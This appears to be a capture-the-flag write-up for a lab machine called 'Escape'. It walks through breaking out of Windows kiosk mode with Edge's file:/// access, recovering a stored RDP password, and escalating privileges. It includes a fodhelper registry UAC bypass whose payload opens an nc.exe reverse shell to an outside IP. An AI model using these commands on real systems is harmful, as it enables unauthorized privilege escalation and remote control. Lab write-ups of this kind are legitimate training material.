Escape, an easy rated machine involved having windows running kiosk mode with only RDP service running, bypassing kiosk by using microsoft edge to enumerate the file system with the file:/// protocol to read files, from where we can find profiles.xml having the encrypted RDP password for admin user which can recovered through BulletsPassView and then escalating through User Account Control (UAC).
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-02-23T17:04:09+00:00; +35s from scanner time.
| ssl-cert: Subject: commonName=Escape
| Issuer: commonName=Escape
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryptionFrom the scan we only have one port open which is RDP, on attempting login it’s going to ask for credentials which we don’t currently know
What if we try to see the login GUI, this can be done by disabling NLA
xfreerdp /v:10.10.73.33 -sec-nlaWith this username, we’ll be able to login
But we are only limited to just see this screen, meaning that we are in Kisok mode
Pressing the start button and using cmd or any other application didn’t worked as it was restricted
We can however use Microsoft Edge and using `file` protocol, we can access the file system
From _admin we can find an interesting file profile.xml having some encrypted password
I tried looking for resources to decrypt this password but there wasn’t any tool to do that, we do have a tool called BulletsPassView which can reveal the passwords masked in bullets, on windows machine import the xml file using Remote Desktop Plus
And edit the profile, which will allow us to view the information in the profile, after that run bulletview, we’ll get the plain text password
However, when logging to RDP with these credentials it’s not going to allow that
This translates to:
To log in remotely, you must have permission to log in through Remote Desktop Services. By default, members of the Principle Desktop Users group have this right. If your current user group does not have this permission, or if this permission has been removed from the Principle Desk user group, you must be granted this permission manually
So the workaround is to spawn a shell through kiosk user and then use runas to switch user, to do that we’ll need to first find a way to spawn cmd and this can be done by copying cmd.exe in the directory where we have permission and rename it to msedege.exe as that's the only executable allowed in this kiosk mode
file:///C:/Windows/System32/cmd.exeNow using runas
runas /user:Escape\admin cmdWe can see here this is in administrators group but with medium mandatory level which means we have to do UAC bypass here
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\Users\admin\Desktop\nc.exe 10.8.0.136 2222 -e powershell.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle HiddenWe’ll receive a reverse shell with admin with all privileges.
But this shell didn’t last long and got terminated, not sure why but I wasn’t able to trigger it again as whenever I tried setting the property value it terminated powershell process
Since we already have GUI we can just use Start-Process powershell -Verb runAs (which I didn't know we could do that) which will prompt for running powershell with administrative privileges
Having these privileges back again we are basically a local admin on the machine.
References
- https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/
- https://www.nirsoft.net/utils/bullets_password_view.html
- https://gist.github.com/netbiosX/a114f8822eb20b115e33db55deee6692
- https://superuser.com/questions/55809/how-to-run-program-from-command-line-with-elevated-rights
